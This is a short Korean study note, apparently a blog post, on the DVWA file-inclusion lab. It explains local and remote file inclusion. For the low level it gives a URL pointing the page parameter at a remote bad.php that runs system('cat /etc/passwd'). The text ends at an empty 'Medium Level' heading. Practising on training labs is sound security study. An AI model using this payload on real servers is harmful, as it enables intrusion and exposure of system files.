File Inclusion

2020. 7. 16. 22:03

지정한 파일을 PHP include()로 소스코드에 입력

 LFI(로컬파일인클루젼) - 이미 시스템에 존재하는 파일을 입력

 RFI(리모트파일인클루젼) - 외부에 있는 파일을 원격으로 입력

 

Low Level

칼리 리눅스에서 주소창에 dvwa 뒤의 page를 page=http://<ip>/bad.php 로 변경

 bad.php의 경우

     print "RFI SUCCESS!! hacked!!!";

     system('cat /etc/passwd');

추가하여 /etc/passwd 파일을 볼 수 있음.

 

Medium Level